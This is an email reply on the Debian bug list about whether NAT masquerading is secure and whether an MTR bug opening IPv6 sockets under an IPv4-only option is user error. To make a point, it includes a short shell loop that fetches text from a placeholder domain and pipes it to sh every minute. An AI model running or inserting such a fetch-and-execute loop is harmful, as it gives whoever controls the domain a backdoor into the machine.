On Mon, Apr 28, 2014 at 12:02:50PM +0200, Jeroen Massar wrote:
> > You're saying that masquerading makes my machine wide open?
>
> Bingo. It is no more "secure" than putting it directly on the network.
> See amongst others http://samy.pl/pwnat/
If I run software on a server inside the NAT it can give away "access"
to resources behind the NAT.
#!/bin/sh
while true ; do
lynx -dump http://www.somedomain.com/lkjasdfkj | sh
sleep 60
done
This gives access to my machine to anyone who can register
"somedomain.com" and install something on the link.
The referenced program and technical paper state that for peer-to-peer
networks this is important. IF peers A and B are on the internet and X
and Y are NATed, then A communicating to B means just set up the
connection. If X wants to communicate with A that's simple as
well. The NAT router will setup the connection once X initiates the
connection. Similarly if B wants to communicate to X, B just has to
trigger (using the protocol somehow) that X starts an outgoing
connection to B. But X communicating with Y becomes problematic. They
have solved this by having the peer-to-peer program silently open up a
connection back into the NATed area.
> Your problem, as you are causing problems for yourself.
>
> That is what this ticket is about: you caused a problem, as the tool
> expects there to be IPv6 support, even if it won't use it.
There is a bug in MTR that it will try to open IPV6 sockets for name
server communication even when explcitly told to do IPV4 only.
I disagree with closing the bug as "user-error".
Roger.
--
+-- Rogier Wolff -- www.harddisk-recovery.nl -- 0800 220 20 20 --
- Datarecovery Services Nederland B.V. Delft. KVK: 30160549 -
| Files foetsie, bestanden kwijt, alle data weg?!
| Blijf kalm en neem contact op met Harddisk-recovery.nl!
--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
